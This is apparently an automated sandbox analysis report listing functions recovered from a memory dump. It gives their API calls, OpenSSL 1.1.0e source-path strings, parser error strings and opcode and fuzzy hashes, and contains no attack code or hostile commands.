Opcode Fuzzy Hash: 19ccea0c19042bef1bdf80fbed14abce4ec0f43ef2e1bba35d459cd6f5208913
Instruction Fuzzy Hash: 9E215BB2A451106BD620776DFC8DFDF779CEF84B20F040662FD0583141E335AA2986B1

Uniqueness

Uniqueness Score: -1.00%

Function 02C12060, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 388COMMON

Download Yara Rule

APIs

__iob_func.MSVCR90(00000000), ref: 02C120BD

Strings

Setting store name to %s, xrefs: 02C121D2
Setting debug level to %d, xrefs: 02C1227A
Setting key type to %d, xrefs: 02C12309
Setting debug file to %s, xrefs: 02C122B8
Setting flags to %d, xrefs: 02C12255
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C12092, 02C120F0, 02C121AA, 02C121C6, 02C121FE, 02C122A5, 02C122E0, 02C12387, 02C123FC

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$Setting debug file to %s$Setting debug level to %d$Setting flags to %d$Setting key type to %d$Setting store name to %s
API String ID: 686374508-306276050
Opcode ID: 39ff2ba061391e1633fbe876e398d44659832fd8252df4c1d6f05e695e98acf5
Instruction ID: b7fff242bcdf43bd69cebd3054737993d5d611398e3cd1564b4a1f73ad21f000
Opcode Fuzzy Hash: 39ff2ba061391e1633fbe876e398d44659832fd8252df4c1d6f05e695e98acf5
Instruction Fuzzy Hash: 87A14DB7F4030017F1107A697C42B5BB38AD7C073AF68053AFB0AD6682FE66F51456A6

Uniqueness

Uniqueness Score: -1.00%

Function 02C301E0, Relevance: 12.4, APIs: 7, Strings: 1, Instructions: 364COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(00000000,?), ref: 02C302EC
memcpy.MSVCR90(?,00000000), ref: 02C30342
memcpy.MSVCR90(?,?,?), ref: 02C30370
memcpy.MSVCR90(?,?,?), ref: 02C30453
memcpy.MSVCR90(?,?,?), ref: 02C304D9

Strings

..\..\openssl-1.1.0e\crypto\evp\e_aes.c, xrefs: 02C30288, 02C3029B, 02C3060D

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: ..\..\openssl-1.1.0e\crypto\evp\e_aes.c
API String ID: 3510742995-2020344900
Opcode ID: c2904a3922f1db3b94d509e022bf3945f2fd0cb40608f6563e9cbeab4da5171c
Instruction ID: 43429fe27bea4f1f6e2288f15458ef16e8969950da218a3b636b8b847741c406
Opcode Fuzzy Hash: c2904a3922f1db3b94d509e022bf3945f2fd0cb40608f6563e9cbeab4da5171c
Instruction Fuzzy Hash: 10C1E4726047004FE7209B78D8C8BA7B7E8AFC4315F144D6EE8AD87251E736E9448B51

Uniqueness

Uniqueness Score: -1.00%

Function 02BA61A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

printf.MSVCR90(02CB615C), ref: 02BA61E3
printf.MSVCR90(02CB6160), ref: 02BA61ED
printf.MSVCR90(02CB6164), ref: 02BA6215
printf.MSVCR90(02CB6168), ref: 02BA6221

Strings

AND, xrefs: 02BA61D7
%02X, xrefs: 02BA6246

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02X$AND
API String ID: 3524737521-2084899897
Opcode ID: e6099a755a61548661f318027160da5f2d2b6eedde293ca86092d010a7a90d0a
Instruction ID: 5c0284f69fdf71ec5cdf8f7cb05508c5ae7aa50f779f7d7b1bd588c320fc6182
Opcode Fuzzy Hash: e6099a755a61548661f318027160da5f2d2b6eedde293ca86092d010a7a90d0a
Instruction Fuzzy Hash: C4113AB1D4C71067EA125659AC257E7FB6E9FC4B08F1C41A7D8DA03302D321E5A186D3

Uniqueness

Uniqueness Score: -1.00%

Function 02BA6380, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_sopen_s.MSVCR90(?,?,00008000,00000010,00000100), ref: 02BA639F
_filelength.MSVCR90(?), ref: 02BA63B7
_close.MSVCR90(?), ref: 02BA63CC

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _close_filelength_sopen_s
String ID:
API String ID: 1367608944-0
Opcode ID: c36518fb76037be947089aadf09168f913995a750e0e80851a46324b0daec7d3
Instruction ID: 8db5f4736a75113104f1dd2709ab6703b9ce8d64e2f6fb077ceee9a2df2d8590
Opcode Fuzzy Hash: c36518fb76037be947089aadf09168f913995a750e0e80851a46324b0daec7d3
Instruction Fuzzy Hash: 8911DBB25442016BC610DBF8EC4CA8B7798EFC4771F144A69F997C2180DB30E564C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02C00070, Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 335COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(?,00000020,?), ref: 02C0014D

Strings

assertion failed: ctx->buf_off + i < (int)sizeof(ctx->buf), xrefs: 02C00132
assertion failed: ctx->buf_len >= ctx->buf_off, xrefs: 02C000FF
..\..\openssl-1.1.0e\crypto\evp\bio_b64.c, xrefs: 02C000FA, 02C0012D

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: ..\..\openssl-1.1.0e\crypto\evp\bio_b64.c$assertion failed: ctx->buf_len >= ctx->buf_off$assertion failed: ctx->buf_off + i < (int)sizeof(ctx->buf)
API String ID: 3510742995-3302055567
Opcode ID: 8acbf9076d0278c5fbb6f753afd959badcd793b778ac32854448c4479c637a4b
Instruction ID: 553cafbb184d18b9a6640fe701a4405bca142e77cd933bab7328a1ecddd02726
Opcode Fuzzy Hash: 8acbf9076d0278c5fbb6f753afd959badcd793b778ac32854448c4479c637a4b
Instruction Fuzzy Hash: 89C19FB5908B068FC730DF69D8C0B6BB7E5BB84704F45492EE59A87681E730E644CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02BAE072, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 417COMMON

Download Yara Rule

Strings

wrong type "string" for ~ operator, xrefs: 02BAE0E3
wrong type "integer" for ~ operator, xrefs: 02BAE09F
wrong type "boolean" for ~ operator, xrefs: 02BAE0F8
wrong type "float" for ~ operator, xrefs: 02BAE0C4

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for ~ operator$wrong type "float" for ~ operator$wrong type "integer" for ~ operator$wrong type "string" for ~ operator
API String ID: 0-2147079349
Opcode ID: 5277a17ebaf1af4f7842ffb4335381df74ac70ba269938c3c1b7e3956d07bb71
Instruction ID: 8aa730c596fa786c5995bb4c1b5b49ea9058347ae30d3aff8c7f6600f17505d2
Opcode Fuzzy Hash: 5277a17ebaf1af4f7842ffb4335381df74ac70ba269938c3c1b7e3956d07bb71
Instruction Fuzzy Hash: D1027CB09083019FD314CF18C494AAAB7F5FFC8304F148AAEE9898B352E774D955CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02BAC083, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 402COMMON

Download Yara Rule

Strings

wrong type "integer" for at operator, xrefs: 02BAC0A6
wrong type "string" for at operator, xrefs: 02BAC0C5
wrong type "boolean" for at operator, xrefs: 02BAC0D8
wrong type "float" for at operator, xrefs: 02BAC0B2

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for at operator$wrong type "float" for at operator$wrong type "integer" for at operator$wrong type "string" for at operator
API String ID: 0-3797521198
Opcode ID: 1eab900ba8230b6d9d4ae92a3ddef8c94fd4a6b6035bba086fb862b647029c74
Instruction ID: 0c28244e38d6249893f547c4af36a2a9891489c0dd8771d19a49fc3e6c7fc4ac
Opcode Fuzzy Hash: 1eab900ba8230b6d9d4ae92a3ddef8c94fd4a6b6035bba086fb862b647029c74
Instruction Fuzzy Hash: 8B026BB06083419FD324CF18C494AAAB7F5FFC8704F148AAEE5898B351E771D956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C3C260, Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 381COMMON

Download Yara Rule

APIs

Part of subcall function 02BD57D0: malloc.MSVCR90(00000142,02BDB898,00000000,..\..\openssl-1.1.0e\crypto\ex_data.c,00000142,00000058), ref: 02BD57F8

memset.MSVCR90(00000000,?,00000000), ref: 02C3C3A4

Strings

..\..\openssl-1.1.0e\crypto\pkcs12\p12_key.c, xrefs: 02C3C2CA, 02C3C2D9, 02C3C2F1, 02C3C33B, 02C3C40F, 02C3C42B, 02C3C43F, 02C3C453, 02C3C467

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: mallocmemset
String ID: ..\..\openssl-1.1.0e\crypto\pkcs12\p12_key.c
API String ID: 2882185209-3913858495
Opcode ID: 1c4f95ac3be4ed8e35b2779316f82d0e0c9b95f10397379e991168038f469c61
Instruction ID: 89292478158921bbd82e8bbb2ef6f974195ea494882165859a0d6ba62f2ee7e0
Opcode Fuzzy Hash: 1c4f95ac3be4ed8e35b2779316f82d0e0c9b95f10397379e991168038f469c61
Instruction Fuzzy Hash: 6DC1A1B56483019BD711DE659C80B7FB7EAAFC4708F080D2DF986A7241E771DA05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02BF4730, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 248COMMON

Download Yara Rule

APIs

memset.MSVCR90(?,00000020,?,00000000,?,00000000,02BF4B5B,02C40B80,00000009,?,?,00000000,02BE1866,?,00000000,?), ref: 02BF47CF

Strings

%04x - , xrefs: 02BF4838
%02x%c, xrefs: 02BF48AE
, xrefs: 02BF4882
%s%04x - <SPACES/NULS>, xrefs: 02BF49C0

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID: $%02x%c$%04x - $%s%04x - <SPACES/NULS>
API String ID: 2221118986-310954626
Opcode ID: d3e033dfa147a67afeb9f4085eb073a3cd08cb513eff91f7f43210c5c6078c51
Instruction ID: bdd4bb5c2327faed2c23ec9b993a13cd01162e1ad205caee33ba98ad06287e51
Opcode Fuzzy Hash: d3e033dfa147a67afeb9f4085eb073a3cd08cb513eff91f7f43210c5c6078c51
Instruction Fuzzy Hash: 5D81F4726083446FD320DE58D890BEBB3F9EBC9704F4489ADFB9547240E775D9088B92

Uniqueness

Uniqueness Score: -1.00%

Function 02BE8330, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 135stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCR90(?,permitted,00000009,?,00000000), ref: 02BE838A
strncmp.MSVCR90(?,excluded,00000008), ref: 02BE83AF

Strings

..\..\openssl-1.1.0e\crypto\x509v3\v3_ncons.c, xrefs: 02BE8460, 02BE847A
permitted, xrefs: 02BE8384
excluded, xrefs: 02BE83A9

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: strncmp
String ID: ..\..\openssl-1.1.0e\crypto\x509v3\v3_ncons.c$excluded$permitted
API String ID: 1114863663-3364002927
Opcode ID: f21784038a35c356847baa07c24ce419401fdf5d953dbaa1fafa4647ee385b24
Instruction ID: 1a1ece99693ed499e5ff9d259c92c8168fe217b65ffcbe8f6366505d244d6639
Opcode Fuzzy Hash: f21784038a35c356847baa07c24ce419401fdf5d953dbaa1fafa4647ee385b24
Instruction Fuzzy Hash: 63412D716447416BF720E664CC81F6B73A9DF84B08F0885F8FA4B9B252F775E5018B92

Uniqueness

Uniqueness Score: -1.00%

Function 02C68650, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

_vsnprintf.MSVCR90(?,000000A0,?,?), ref: 02C686A1
_snprintf.MSVCR90(?,000000A0,%s near '%s',?,00000000), ref: 02C686FC
_snprintf.MSVCR90(?,000000A0,%s near end of file,?), ref: 02C6872A

Strings

%s near '%s', xrefs: 02C686EA
%s near end of file, xrefs: 02C68718

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintf$_vsnprintf
String ID: %s near '%s'$%s near end of file
API String ID: 372289625-424205537
Opcode ID: 01644ec0f9351dbdd02c15637f146a2286b47e1beb39e83113799f914a010383
Instruction ID: db05ae822912890ecd6e93af1ccbfb216bf9aa6b39819d26a3d5e3ee81ae57b2
Opcode Fuzzy Hash: 01644ec0f9351dbdd02c15637f146a2286b47e1beb39e83113799f914a010383
Instruction Fuzzy Hash: C3316FB05083819FE230CB14D888BABB7E9EBC5704F404A1DE59A57280D771AA08CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 02BE2010, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02BE20F9

Strings

0123456789abcdef, xrefs: 02BE20EC
, xrefs: 02BE20A4
0123456789ABCDEF, xrefs: 02BE20E5

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: $0123456789ABCDEF$0123456789abcdef
API String ID: 1302938615-30751140
Opcode ID: 7573bd32f6a58fd25749d5b0f22da6a194a55e523af05f500177bbca97018804
Instruction ID: 31e3e01da8a2923c46afcca27092c0783c1f0d621d6fa313c65ffa885bb56054
Opcode Fuzzy Hash: 7573bd32f6a58fd25749d5b0f22da6a194a55e523af05f500177bbca97018804
Instruction Fuzzy Hash: 8C918CB1A083418BDB14DE28C88462BB7E9EFC8358F08499DEDC6A7341D771E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02C10650, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000,?,00000000,02C10C69,?,00000000,02C10DE8,?), ref: 02C1066B

Strings

..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02C1067E, 02C106AA, 02C106E9, 02C1070C

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: CertCertificateContextProperty
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 665277682-79188018
Opcode ID: 405a45f3d5801806899cec70ea23df141c591937be8f7b454017e9985cc60a18
Instruction ID: b306e0cfd8ca9c9133bf8133195c7d4843e168a0df3d764c376afebe3c55825a
Opcode Fuzzy Hash: 405a45f3d5801806899cec70ea23df141c591937be8f7b454017e9985cc60a18
Instruction Fuzzy Hash: C0113DB1F803117AF620B670BC86F6B234DEB80B19F60092DFE05DA2C1FB61D5605AD5

Uniqueness

Uniqueness Score: -1.00%

Function 02BA4120, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13COMMON

Download Yara Rule

APIs

printf.MSVCR90(-------------------------------------------------------), ref: 02BA412C

Part of subcall function 02BA3C90: printf.MSVCR90(02CB6060), ref: 02BA3CAB
Part of subcall function 02BA3C90: printf.MSVCR90(%p childs:%d depth:%d failure:%p,?,00000000,?,?), ref: 02BA3CDA
Part of subcall function 02BA3C90: printf.MSVCR90(02CB6088), ref: 02BA3CF5
Part of subcall function 02BA3C90: printf.MSVCR90(02CB608C), ref: 02BA3D0A
Part of subcall function 02BA3C90: printf.MSVCR90(%s = ,?), ref: 02BA3D25
Part of subcall function 02BA3C90: printf.MSVCR90(02CB6098), ref: 02BA3D38
Part of subcall function 02BA3C90: printf.MSVCR90(%02x ,?), ref: 02BA3D61
Part of subcall function 02BA3C90: printf.MSVCR90(02CB60BC), ref: 02BA3DEE
Part of subcall function 02BA3C90: printf.MSVCR90(02CB60C0), ref: 02BA3E03

printf.MSVCR90(-------------------------------------------------------,?), ref: 02BA4140

Strings

-------------------------------------------------------, xrefs: 02BA413B
-------------------------------------------------------, xrefs: 02BA4127

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: -------------------------------------------------------$-------------------------------------------------------
API String ID: 3524737521-1924146118
Opcode ID: ebe7f6c238c8dc81e42882ef455a2ab73be77b2e9adeadb10e13a447fbd09bf1
Instruction ID: 440ee4380ccd98f23cc0c67915bdd3067992336ceaa1cab776b3308ab02d1d2f
Opcode Fuzzy Hash: ebe7f6c238c8dc81e42882ef455a2ab73be77b2e9adeadb10e13a447fbd09bf1
Instruction Fuzzy Hash: ECC01232D542206BD604F799FC65D8A779C9F48510B014597E94553200D570E8408BE2

Uniqueness

Uniqueness Score: -1.00%

Function 02BB06D0, Relevance: 6.3, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

free.MSVCR90(?,?,?), ref: 02BB0703
free.MSVCR90(?,?,?,?,?,02BB0BB6,?,?,00000000,?,?,?), ref: 02BB0709
free.MSVCR90(?,?,?,?,?,02BB0BB6,?,?,00000000,?,?,?), ref: 02BB0723
free.MSVCR90(?,?,?,02BB0BB6,?,?,00000000,?,?,?), ref: 02BB072C
free.MSVCR90(00000000,?,?,02BB0BB6,?,?,00000000,?,?,?), ref: 02BB0750

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1b11ac43ab49c249d09cf5fa311c3e9da2a9b9011a3d97cf75d6077331893b82
Instruction ID: fe4d743ce0d7e597d13d6dd326bd4c7063c481cde18355023fa9fd4bee7ed9f7
Opcode Fuzzy Hash: 1b11ac43ab49c249d09cf5fa311c3e9da2a9b9011a3d97cf75d6077331893b82
Instruction Fuzzy Hash: 8B11C3B5901B049FC320EF6AD9C0867F7F5FF89614391896ED59A83A00C770F5548FA5

Uniqueness

Uniqueness Score: -1.00%

